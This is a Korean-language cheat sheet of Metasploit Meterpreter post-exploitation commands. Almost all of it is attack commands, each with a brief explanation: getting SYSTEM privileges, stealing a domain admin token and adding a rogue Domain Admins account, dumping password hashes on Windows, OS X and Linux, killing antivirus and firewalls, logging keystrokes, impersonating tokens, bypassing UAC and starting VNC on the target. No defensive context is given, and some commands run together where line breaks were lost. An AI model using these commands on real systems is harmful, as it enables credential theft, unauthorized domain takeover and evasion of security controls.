post exploit

■ 미터프리터(meterpreter) 포스트 익스플로잇(post exploit) 명령

 

미터프리터를 사용하여 윈도우 기반 시스템의 권한을 상승한다.meterpreter> use privmeterpreter> getsystem

 

주어진 프로세스 ID에서 도메인 관리자 토큰을 훔쳐 도메인 계정을 추가하고 해당 계정을 도메인 관리 그룹으로 지정한다.

meterpreter> psmeterpreter> steal_token 1784meterpreter> shellc:\windows\system32> net user metasploit p@55w0rd

/ADD /DOMAINc:\windows\system32> net group "Domain Admin" metasploit /ADD /DOMAIN

 

SAM 데이터베이스에서 패스워드 해시를 덤프한다.

(주의)만약 windows 2008 서버에서 getsystem, hashdump 명령어 예외가

발생한다면 system 계정에서 동작하는 프로세스로 이주할 필요가 있다.

meterpreter> use privmeterpreter> getsystemmeterpreter> hashdump

 

다른 프로세스로 자동 이주한다.meterpreter> run migrate

 

killav 미터프리터 스크립트 대상에서 동작하는 백신을 종료한다.meterpreter> run killav

 

이주한 프로세스 내에 대상 시스템 키보드 입력을 수집한다.

meterpreter> psmeterpreter> migrate 1436meterpreter> keyscan_startmeterpreter> keyscan_dumpmeterpreter> keyscan_stop

 

관리자로 가장하기 위해 익명을 사용한다.

meterpreter> use incognitometerpreter> list_tokens -umeterpreter> use privmeterpreter> getsystemmeterpreter>

list_tokens -umeterpreter> impersonate_token IHAZSECURITY\\Administrator

 

점령한 대상에 존재하는 보호 메커니즘을 파악하고, 명령과 관련된 도움말을 출력하며, 방화벽 같은 모든 발견된 대응책을 종료한다.

meterpreter> run getcountermeasuremeterpreter> run getcountermeasure -hmeterpreter> run getcountermeasure -d -k

 

점령한 시스템이 가상 머신인지 확인한다.meterpreter> run checkvm

 

현재 미터프리터 콘솔 세션에서 명령 창을 띄운다.meterpreter> shell

 

대상 머신에서 원격 GUI 프로그램(EX: VNC)을 실행한다.meterpreter> run vnc

 

현재 동작하는 미터프리터 콘솔을 백그라운드로 전환한다.meterpreter> background

 

윈도우의 사용자 접근 제어(UAC, User Access Control)를 우회한다.meterpreter> run post/windows/escalate/bypassuac

 

OS X 시스템의 해시를 추출한다.meterpreter> run post/osx/gather/hashdump

 

리눅스 시스템의 해시를 추출한다.meterpreter> run post/linux/gather/hashdump